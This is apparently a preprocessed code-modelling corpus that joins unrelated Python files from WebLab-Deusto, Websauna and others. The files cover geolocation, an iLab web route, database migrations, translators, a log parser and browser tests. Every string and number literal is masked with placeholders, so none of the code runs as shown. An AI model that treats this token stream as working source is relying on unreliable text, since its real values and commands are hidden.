config [ configuration_doc . CORE_GEOIP2_CITY_FILEPATH ] <EOL> if not os . path . exists ( geoip2_city_filepath or '<STR_LIT>' ) : <EOL> if not is_testing ( ) and not config [ configuration_doc . CORE_IGNORE_LOCATIONS ] : <EOL> local_directory = os . path . abspath ( "<STR_LIT:.>" ) <EOL> if "<STR_LIT:U+0020>" in local_directory : <EOL> local_directory = '<STR_LIT>' . format ( local_directory ) <EOL> print ( "<STR_LIT>" . format ( filepath = geoip2_city_filepath , directory = local_directory ) ) <EOL> else : <EOL> if self . local_country is None or self . local_city is None : <EOL> try : <EOL> local_public_ip_address = requests . get ( "<STR_LIT>" ) . json ( ) [ '<STR_LIT>' ] <EOL> except Exception as e : <EOL> local_public_ip_address = None <EOL> if local_public_ip_address is None : <EOL> try : <EOL> local_public_ip_address = requests . get ( "<STR_LIT>" ) . json ( ) [ '<STR_LIT>' ] <EOL> except Exception as e : <EOL> local_public_ip_address = None <EOL> if local_public_ip_address is not None : <EOL> try : <EOL> reader = GeoIP2Reader ( geoip2_city_filepath ) <EOL> if self . local_country is None : <EOL> self . local_country = reader . city ( local_public_ip_address ) . country . iso_code <EOL> if self . local_city is None : <EOL> self . local_city = reader . city ( local_public_ip_address ) . city . name <EOL> except Exception : <EOL> print ( "<STR_LIT>" . format ( local_public_ip_address ) ) <EOL> traceback . print_exc ( ) <EOL> self . locator = AddressLocator ( config , local_country = self . local_country , local_city = self . local_city ) <EOL> def stop ( self ) : <EOL> self . stopping = True <EOL> def sleepStep ( self ) : <EOL> STEP = <NUM_LIT:0.1> <EOL> for _ in xrange ( int ( self . SECONDS / STEP ) ) : <EOL> if self . stopping : <EOL> break <EOL> time . sleep ( STEP ) <EOL> def run ( self ) : <EOL> while not self . stopping : <EOL> try : <EOL> changes = self . db . update_locations ( self . locator . locate ) <EOL> except Exception : <EOL> traceback . 
print_exc ( ) <EOL> changes = <NUM_LIT:0> <EOL> if changes == <NUM_LIT:0> : <EOL> self . sleepStep ( ) </s>
<s> from __future__ import print_function , unicode_literals <EOL> from flask import request , make_response <EOL> from weblab . core . wl import weblab_api <EOL> import json <EOL> import traceback <EOL> from weblab . data . experiments import ExperimentId <EOL> from weblab . core . coordinator . clients . ilab_batch import RequestSerializer <EOL> serializer = RequestSerializer ( ) <EOL> @ weblab_api . route_web ( '<STR_LIT>' ) <EOL> def ilab ( ) : <EOL> action = request . headers . get ( '<STR_LIT>' ) <EOL> if action is None : <EOL> return "<STR_LIT>" <EOL> if weblab_api . ctx . session_id is None : <EOL> return "<STR_LIT>" <EOL> if weblab_api . ctx . reservation_id is None : <EOL> try : <EOL> reservation_id_str = weblab_api . api . get_reservation_id_by_session_id ( ) <EOL> weblab_api . ctx . reservation_id = reservation_id_str <EOL> except : <EOL> traceback . print_exc ( ) <EOL> methods = { <EOL> '<STR_LIT>' : process_GetLabConfiguration , <EOL> '<STR_LIT>' : process_Submit , <EOL> '<STR_LIT>' : process_GetExperimentStatus , <EOL> '<STR_LIT>' : process_RetrieveResult , <EOL> '<STR_LIT>' : process_SaveAnnotation , <EOL> '<STR_LIT>' : process_ListAllClientItems , <EOL> '<STR_LIT>' : process_LoadClientItem , <EOL> '<STR_LIT>' : process_SaveClientItem , <EOL> '<STR_LIT>' : process_GetExperimentInformation , <EOL> } <EOL> if not action in methods : <EOL> return "<STR_LIT>" <EOL> response = make_response ( methods [ action ] ( ) ) <EOL> response . content_type = '<STR_LIT>' <EOL> if hasattr ( weblab_api . ctx , '<STR_LIT>' ) : <EOL> for name , value in weblab_api . ctx . other_cookies : <EOL> response . set_cookie ( name , value , path = weblab_api . ctx . location ) <EOL> return response <EOL> def process_GetLabConfiguration ( self ) : <EOL> lab_server_id = serializer . parse_get_lab_configuration_request ( request . data ) <EOL> ilab_request = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> reservation_status = weblab_api . api . 
reserve_experiment ( ExperimentId ( lab_server_id , '<STR_LIT>' ) , json . dumps ( ilab_request ) , '<STR_LIT:{}>' ) <EOL> lab_configuration = reservation_status . initial_data <EOL> return serializer . generate_lab_configuration_response ( lab_configuration ) <EOL> def process_Submit ( self ) : <EOL> lab_server_id , experiment_specification , _ , _ = serializer . parse_submit_request ( request . data ) <EOL> ilab_request = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : experiment_specification <EOL> } <EOL> reservation_status = weblab_api . api . reserve_experiment ( ExperimentId ( lab_server_id , '<STR_LIT>' ) , json . dumps ( ilab_request ) , '<STR_LIT:{}>' ) <EOL> weblab_api . ctx . other_cookies = { '<STR_LIT>' : reservation_status . reservation_id . id } <EOL> return """<STR_LIT>""" % reservation_status . position <EOL> def process_GetExperimentStatus ( self ) : <EOL> if self . reservation_id is None : <EOL> return "<STR_LIT>" <EOL> reservation_status = weblab_api . api . get_reservation_status ( ) <EOL> if reservation_status . status == "<STR_LIT>" : <EOL> length = reservation_status . position <EOL> status = <NUM_LIT:1> <EOL> elif reservation_status . status == "<STR_LIT>" : <EOL> length = <NUM_LIT:0> <EOL> status = <NUM_LIT:2> <EOL> elif reservation_status . status == "<STR_LIT>" : <EOL> length = <NUM_LIT:0> <EOL> status = <NUM_LIT:3> <EOL> else : <EOL> raise Exception ( "<STR_LIT>" % reservation_status . status ) <EOL> return """<STR_LIT>""" % ( status , length ) <EOL> def process_RetrieveResult ( self ) : <EOL> if self . reservation_id is None : <EOL> return "<STR_LIT>" <EOL> reservation_status = weblab_api . api . get_reservation_status ( ) <EOL> try : <EOL> response = json . loads ( reservation_status . initial_data ) <EOL> except : <EOL> return "<STR_LIT>" % reservation_status . initial_data <EOL> code = response [ '<STR_LIT:code>' ] <EOL> results = response [ '<STR_LIT>' ] <EOL> xmlResults = response [ '<STR_LIT>' ] <EOL> return serializer . 
generate_retrieve_result_response ( code , results , xmlResults ) <EOL> def process_GetExperimentInformation ( self ) : <EOL> return """<STR_LIT>""" <EOL> def process_SaveAnnotation ( self ) : <EOL> return """<STR_LIT>""" <EOL> def process_ListAllClientItems ( self ) : <EOL> return """<STR_LIT>""" <EOL> def process_SaveClientItem ( self ) : <EOL> return """<STR_LIT>""" <EOL> def process_LoadClientItem ( self ) : <EOL> return "<STR_LIT>" </s>
<s> from __future__ import print_function , unicode_literals <EOL> import os <EOL> from alembic . script import ScriptDirectory <EOL> from alembic . config import Config <EOL> from alembic . migration import MigrationContext <EOL> from alembic import command <EOL> from sqlalchemy import create_engine <EOL> REGULAR_ALEMBIC_PATH = os . path . join ( os . path . abspath ( os . path . dirname ( __file__ ) ) , '<STR_LIT>' ) <EOL> SCHEDULING_ALEMBIC_PATH = os . path . join ( os . path . abspath ( os . path . dirname ( __file__ ) ) , '<STR_LIT>' ) <EOL> DEBUG = False <EOL> class DbUpgrader ( object ) : <EOL> def __init__ ( self , regular_url , scheduling_url ) : <EOL> self . regular_upgrader = DbRegularUpgrader ( regular_url ) <EOL> if scheduling_url is not None : <EOL> self . scheduling_upgrader = DbSchedulingUpgrader ( scheduling_url ) <EOL> else : <EOL> self . scheduling_upgrader = DbNullUpgrader ( ) <EOL> @ property <EOL> def regular_head ( self ) : <EOL> return self . regular_upgrader . head <EOL> @ property <EOL> def scheduling_head ( self ) : <EOL> return self . scheduling_upgrader . head <EOL> def check_updated ( self ) : <EOL> return self . regular_upgrader . check ( ) and self . scheduling_upgrader . check ( ) <EOL> def upgrade ( self ) : <EOL> self . regular_upgrader . upgrade ( ) <EOL> self . scheduling_upgrader . upgrade ( ) <EOL> class DbNullUpgrader ( object ) : <EOL> @ property <EOL> def head ( self ) : <EOL> return None <EOL> def check ( self ) : <EOL> return True <EOL> def upgrade ( self ) : <EOL> pass <EOL> class DbParticularUpgrader ( object ) : <EOL> alembic_path = None <EOL> def __init__ ( self , url ) : <EOL> if url . startswith ( '<STR_LIT>' ) : <EOL> try : <EOL> import MySQLdb <EOL> assert MySQLdb is not None <EOL> except ImportError : <EOL> import pymysql_sa <EOL> pymysql_sa . make_default_mysql_dialect ( ) <EOL> self . url = url <EOL> self . config = Config ( os . path . join ( self . alembic_path , "<STR_LIT>" ) ) <EOL> self . config . 
set_main_option ( "<STR_LIT>" , self . alembic_path ) <EOL> self . config . set_main_option ( "<STR_LIT:url>" , self . url ) <EOL> self . config . set_main_option ( "<STR_LIT>" , self . url ) <EOL> @ property <EOL> def head ( self ) : <EOL> script = ScriptDirectory . from_config ( self . config ) <EOL> return script . get_current_head ( ) <EOL> def check ( self ) : <EOL> engine = create_engine ( self . url ) <EOL> context = MigrationContext . configure ( engine ) <EOL> current_rev = context . get_current_revision ( ) <EOL> if DEBUG : <EOL> print ( "<STR_LIT>" % self . url ) <EOL> print ( "<STR_LIT>" % self . head ) <EOL> print ( "<STR_LIT>" % current_rev ) <EOL> print ( "<STR_LIT>" , current_rev == self . head ) <EOL> print ( ) <EOL> return self . head == current_rev <EOL> def upgrade ( self ) : <EOL> if not self . check ( ) : <EOL> command . upgrade ( self . config , "<STR_LIT>" ) <EOL> class DbRegularUpgrader ( DbParticularUpgrader ) : <EOL> alembic_path = REGULAR_ALEMBIC_PATH <EOL> class DbSchedulingUpgrader ( DbParticularUpgrader ) : <EOL> alembic_path = SCHEDULING_ALEMBIC_PATH </s>
<s> from __future__ import print_function , unicode_literals <EOL> import manager as VirtualMachineManager <EOL> import dummy as VirtualMachineDummy <EOL> import virtualbox as VirtualBox <EOL> def _ ( ) : <EOL> print ( VirtualMachineManager , VirtualMachineDummy , VirtualBox ) <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] </s>
<s> from __future__ import print_function , unicode_literals <EOL> from voodoo import log <EOL> from voodoo . gen . caller_checker import caller_check <EOL> from voodoo . log import logged <EOL> from voodoo . override import Override <EOL> from weblab . data import server_type as ServerType <EOL> import weblab . translator . translator as translator <EOL> class StoresNothingTranslator ( translator . Translator ) : <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_on_start ( self , session_id ) : <EOL> super ( StoresNothingTranslator , self ) . do_on_start ( session_id ) <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_before_send_command ( self , session_id , command ) : <EOL> return None <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_after_send_command ( self , session_id , response ) : <EOL> return None <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_before_send_file ( self , session_id , file ) : <EOL> return None <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_after_send_file ( self , session_id , response ) : <EOL> return None <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_on_finish ( self , session_id ) : <EOL> super ( StoresNothingTranslator , self ) . do_on_finish ( session_id ) <EOL> class StoresEverythingTranslator ( translator . Translator ) : <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . 
Proxy ) <EOL> def do_on_start ( self , session_id ) : <EOL> super ( StoresEverythingTranslator , self ) . do_on_start ( session_id ) <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_before_send_command ( self , session_id , command ) : <EOL> return command <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_after_send_command ( self , session_id , response ) : <EOL> return response <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_before_send_file ( self , session_id , file ) : <EOL> return file <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_after_send_file ( self , session_id , response ) : <EOL> return response <EOL> @ Override ( translator . Translator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_on_finish ( self , session_id ) : <EOL> super ( StoresEverythingTranslator , self ) . do_on_finish ( session_id ) <EOL> class StoresEverythingExceptForFilesTranslator ( StoresEverythingTranslator ) : <EOL> @ Override ( StoresEverythingTranslator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_before_send_file ( self , session_id , file ) : <EOL> return None <EOL> @ Override ( StoresEverythingTranslator ) <EOL> @ logged ( log . level . Info ) <EOL> @ caller_check ( ServerType . Proxy ) <EOL> def do_after_send_file ( self , session_id , response ) : <EOL> return None </s>
<s> import sys <EOL> import os . path <EOL> import re <EOL> if len ( sys . argv ) != <NUM_LIT:2> : <EOL> print >> sys . stderr , "<STR_LIT>" % sys . argv [ <NUM_LIT:0> ] <EOL> print >> sys . stderr , "<STR_LIT>" % sys . argv [ <NUM_LIT:0> ] <EOL> sys . exit ( - <NUM_LIT:1> ) <EOL> if not os . path . exists ( sys . argv [ <NUM_LIT:1> ] ) : <EOL> print >> sys . stderr , "<STR_LIT>" % sys . argv [ <NUM_LIT:0> ] <EOL> print >> sys . stderr , "<STR_LIT>" % sys . argv [ <NUM_LIT:0> ] <EOL> sys . exit ( - <NUM_LIT:2> ) <EOL> started = { <EOL> } <EOL> CALL_ID_REGEX = '<STR_LIT>' <EOL> CALL_START_REGEX = r'<STR_LIT>' <EOL> CALL_END_REGEX = r'<STR_LIT>' <EOL> for line in open ( sys . argv [ <NUM_LIT:1> ] ) : <EOL> mo = re . match ( CALL_START_REGEX % CALL_ID_REGEX , line ) <EOL> if mo != None : <EOL> call_id = mo . groups ( ) [ <NUM_LIT:0> ] <EOL> if started . has_key ( call_id ) : <EOL> number , lines_start , lines_end = started [ call_id ] <EOL> lines_start . append ( line ) <EOL> started [ call_id ] [ <NUM_LIT:0> ] = number + <NUM_LIT:1> <EOL> else : <EOL> started [ call_id ] = [ <NUM_LIT:1> , [ line ] , [ ] ] <EOL> else : <EOL> mo = re . match ( CALL_END_REGEX % CALL_ID_REGEX , line ) <EOL> if mo != None : <EOL> call_id = mo . groups ( ) [ <NUM_LIT:0> ] <EOL> if started . has_key ( call_id ) : <EOL> number , lines_start , lines_end = started [ call_id ] <EOL> if number == <NUM_LIT:1> : <EOL> started . pop ( call_id ) <EOL> else : <EOL> lines_end . append ( line ) <EOL> started [ call_id ] [ <NUM_LIT:0> ] = number - <NUM_LIT:1> <EOL> for call_id in started : <EOL> print started [ call_id ] [ <NUM_LIT:1> : ] </s>
<s> import os <EOL> import unittest <EOL> import shutil <EOL> import wcloud . tasks . wcloud_tasks as wcloud_tasks <EOL> from weblab . admin . script import Creation <EOL> cwd = os . getcwd ( ) <EOL> if cwd . endswith ( os . path . join ( "<STR_LIT>" , "<STR_LIT:test>" ) ) : <EOL> cwd = cwd [ <NUM_LIT:0> : len ( cwd ) - len ( os . path . join ( "<STR_LIT>" , "<STR_LIT:test>" ) ) ] <EOL> os . chdir ( os . path . join ( cwd , "<STR_LIT>" ) ) <EOL> class TestWcloudTasks ( unittest . TestCase ) : <EOL> wcloud_settings = { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT:password>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> def test_nothing ( self ) : <EOL> pass <EOL> def test_prepare_system ( self ) : <EOL> settings = wcloud_tasks . prepare_system . delay ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:password>" , "<STR_LIT>" , <EOL> self . wcloud_settings ) . get ( ) <EOL> self . _settings = settings <EOL> def test_create_weblab_environment ( self ) : <EOL> settings = wcloud_tasks . prepare_system . delay ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:password>" , "<STR_LIT>" , <EOL> self . wcloud_settings ) . get ( ) <EOL> self . _settings = settings <EOL> base_url = os . path . join ( wcloud_tasks . flask_app . config [ "<STR_LIT>" ] , settings [ Creation . BASE_URL ] ) <EOL> wcloud_tasks . create_weblab_environment . delay ( base_url , settings ) . get ( ) <EOL> def test_configure_web_server ( self ) : <EOL> settings = wcloud_tasks . prepare_system . delay ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:password>" , "<STR_LIT>" , <EOL> self . wcloud_settings ) . get ( ) <EOL> self . _settings = settings <EOL> base_url = os . path . join ( wcloud_tasks . flask_app . config [ "<STR_LIT>" ] , settings [ Creation . BASE_URL ] ) <EOL> creation_results = wcloud_tasks . create_weblab_environment . delay ( base_url , settings ) . get ( ) <EOL> wcloud_tasks . configure_web_server . 
delay ( creation_results ) . get ( ) <EOL> def test_register_and_start_instance ( self ) : <EOL> settings = wcloud_tasks . prepare_system . delay ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:password>" , "<STR_LIT>" , <EOL> self . wcloud_settings ) . get ( ) <EOL> self . _settings = settings <EOL> base_url = os . path . join ( wcloud_tasks . flask_app . config [ "<STR_LIT>" ] , settings [ Creation . BASE_URL ] ) <EOL> creation_results = wcloud_tasks . create_weblab_environment . delay ( base_url , settings ) . get ( ) <EOL> wcloud_tasks . configure_web_server . delay ( creation_results ) . get ( ) <EOL> wcloud_tasks . register_and_start_instance . delay ( "<STR_LIT>" , { } ) . get ( ) <EOL> start_port , end_port = creation_results [ "<STR_LIT>" ] , creation_results [ "<STR_LIT>" ] <EOL> def test_finish_deployment ( self ) : <EOL> settings = wcloud_tasks . prepare_system . delay ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:password>" , "<STR_LIT>" , <EOL> self . wcloud_settings ) . get ( ) <EOL> self . _settings = settings <EOL> base_url = os . path . join ( wcloud_tasks . flask_app . config [ "<STR_LIT>" ] , settings [ Creation . BASE_URL ] ) <EOL> creation_results = wcloud_tasks . create_weblab_environment . delay ( base_url , settings ) . get ( ) <EOL> wcloud_tasks . configure_web_server . delay ( creation_results ) . get ( ) <EOL> wcloud_tasks . register_and_start_instance . delay ( "<STR_LIT>" , self . wcloud_settings ) . get ( ) <EOL> start_port , end_port = creation_results [ "<STR_LIT>" ] , creation_results [ "<STR_LIT>" ] <EOL> wcloud_tasks . finish_deployment . delay ( "<STR_LIT>" , settings , start_port , end_port , self . wcloud_settings ) . get ( ) <EOL> def setUp ( self ) : <EOL> import wcloud . test . prepare as prepare <EOL> prepare . prepare_test_database ( "<STR_LIT:root>" , "<STR_LIT:password>" ) <EOL> def tearDown ( self ) : <EOL> try : <EOL> pass <EOL> except : <EOL> pass <EOL> try : <EOL> instances_file = os . path . 
join ( wcloud_tasks . flask_app . config [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> f = file ( instances_file ) <EOL> lines = f . readlines ( ) <EOL> lines = [ line . replace ( "<STR_LIT:\n>" , "<STR_LIT>" ) + "<STR_LIT:\n>" for line in lines if not "<STR_LIT>" in line ] <EOL> f . close ( ) <EOL> f = file ( instances_file , "<STR_LIT:w>" ) <EOL> f . writelines ( lines ) <EOL> f . close ( ) <EOL> except : <EOL> pass <EOL> apacheconf = os . path . join ( wcloud_tasks . flask_app . config [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> lines = open ( apacheconf , "<STR_LIT:r>" ) . readlines ( ) <EOL> cleared_lines = [ line . strip ( ) + "<STR_LIT:\n>" for line in lines if "<STR_LIT>" not in line ] <EOL> open ( apacheconf , "<STR_LIT:w>" ) . writelines ( cleared_lines ) <EOL> try : <EOL> os . system ( "<STR_LIT>" ) <EOL> except : <EOL> pass <EOL> try : <EOL> base_url = os . path . join ( wcloud_tasks . flask_app . config [ "<STR_LIT>" ] , self . _settings [ Creation . BASE_URL ] ) <EOL> shutil . rmtree ( base_url ) <EOL> except : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> from websauna . system . devop . cmdline import init_websauna <EOL> from websauna . utils . configincluder import monkey_patch_paster_config_parser <EOL> def usage ( argv ) : <EOL> cmd = os . path . basename ( argv [ <NUM_LIT:0> ] ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( cmd , cmd ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def main ( argv = sys . argv ) : <EOL> monkey_patch_paster_config_parser ( ) <EOL> if len ( argv ) < <NUM_LIT:2> : <EOL> usage ( argv ) <EOL> config_uri = argv [ <NUM_LIT:1> ] <EOL> request = init_websauna ( config_uri ) <EOL> url = request . registry . settings . get ( "<STR_LIT>" ) <EOL> engine = request . dbsession . get_bind ( ) <EOL> print ( "<STR_LIT>" . format ( engine ) ) <EOL> os . system ( "<STR_LIT>" . format ( url ) ) </s>
<s> from pyramid_mailer import IMailer <EOL> def get_mailer ( registry ) : <EOL> """<STR_LIT>""" <EOL> return registry . getUtility ( IMailer ) </s>
<s> from datetime import timedelta <EOL> import transaction <EOL> from websauna . system . user . models import Activation , User <EOL> from websauna . utils . slug import uuid_to_slug <EOL> from websauna . utils . time import now <EOL> EMAIL = "<STR_LIT>" <EOL> PASSWORD = "<STR_LIT>" <EOL> def get_user ( dbsession ) : <EOL> from websauna . system . user . models import User <EOL> return dbsession . query ( User ) . get ( <NUM_LIT:1> ) <EOL> def test_register_email ( web_server , browser , dbsession ) : <EOL> """<STR_LIT>""" <EOL> b = browser <EOL> b . visit ( web_server ) <EOL> b . find_by_css ( "<STR_LIT>" ) . click ( ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> b . fill ( "<STR_LIT:email>" , EMAIL ) <EOL> b . fill ( "<STR_LIT:password>" , PASSWORD ) <EOL> b . fill ( "<STR_LIT>" , PASSWORD ) <EOL> b . find_by_name ( "<STR_LIT>" ) . click ( ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> user = get_user ( dbsession ) <EOL> assert user . activation . code <EOL> activation_link = "<STR_LIT>" . format ( web_server , user . activation . code ) <EOL> b . visit ( activation_link ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> b . fill ( "<STR_LIT:username>" , EMAIL ) <EOL> b . fill ( "<STR_LIT:password>" , PASSWORD ) <EOL> b . find_by_name ( "<STR_LIT>" ) . click ( ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> def test_register_email_activation_expired ( web_server , browser , dbsession ) : <EOL> """<STR_LIT>""" <EOL> b = browser <EOL> b . visit ( web_server + "<STR_LIT>" ) <EOL> assert b . is_element_visible_by_css ( "<STR_LIT>" ) <EOL> b . fill ( "<STR_LIT:email>" , EMAIL ) <EOL> b . fill ( "<STR_LIT:password>" , PASSWORD ) <EOL> b . fill ( "<STR_LIT>" , PASSWORD ) <EOL> b . find_by_name ( "<STR_LIT>" ) . click ( ) <EOL> assert b . is_element_visible_by_css ( "<STR_LIT>" ) <EOL> with transaction . manager : <EOL> a = dbsession . query ( Activation ) . 
get ( <NUM_LIT:1> ) <EOL> u = dbsession . query ( User ) . get ( <NUM_LIT:1> ) <EOL> a . expires_at = now ( ) - timedelta ( days = <NUM_LIT> ) <EOL> user_uuid = u . uuid <EOL> activation_code = a . code <EOL> activation_link = "<STR_LIT>" . format ( web_server , activation_code ) <EOL> b . visit ( activation_link ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> b . visit ( web_server + "<STR_LIT>" ) <EOL> b . fill ( "<STR_LIT:username>" , EMAIL ) <EOL> b . fill ( "<STR_LIT:password>" , PASSWORD ) <EOL> b . find_by_name ( "<STR_LIT>" ) . click ( ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> b . visit ( web_server + "<STR_LIT>" ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> b . fill ( "<STR_LIT:email>" , EMAIL ) <EOL> b . find_by_name ( "<STR_LIT>" ) . click ( ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> with transaction . manager : <EOL> user = get_user ( dbsession ) <EOL> activation = user . activation <EOL> activation_code = activation . code <EOL> b . visit ( "<STR_LIT>" . format ( web_server , activation_code ) ) <EOL> b . fill ( "<STR_LIT:password>" , "<STR_LIT>" ) <EOL> b . fill ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> b . find_by_name ( "<STR_LIT>" ) . click ( ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) <EOL> b . fill ( "<STR_LIT:username>" , EMAIL ) <EOL> b . fill ( "<STR_LIT:password>" , "<STR_LIT>" ) <EOL> b . find_by_name ( "<STR_LIT>" ) . click ( ) <EOL> assert b . is_element_present_by_css ( "<STR_LIT>" ) </s>
<s> from django . contrib import admin <EOL> from testproj . testapp import models <EOL> admin . site . register ( models . SecretFile ) </s>
<s> from db . conn import ( <EOL> test as _test , <EOL> food as _food , <EOL> user as _user , <EOL> test_files as _test_files , <EOL> food_files as _food_files , <EOL> user_files as _user_files , <EOL> ) <EOL> MONGO_DB_MAPPING = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:test>' : _test , <EOL> '<STR_LIT>' : _food , <EOL> '<STR_LIT:user>' : _user , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:test>' : _test_files , <EOL> '<STR_LIT>' : _food_files , <EOL> '<STR_LIT:user>' : _user_files , <EOL> } <EOL> } </s>
<s> from wx . lib . embeddedimage import PyEmbeddedImage <EOL> retriever_logo_liberation = PyEmbeddedImage ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" 
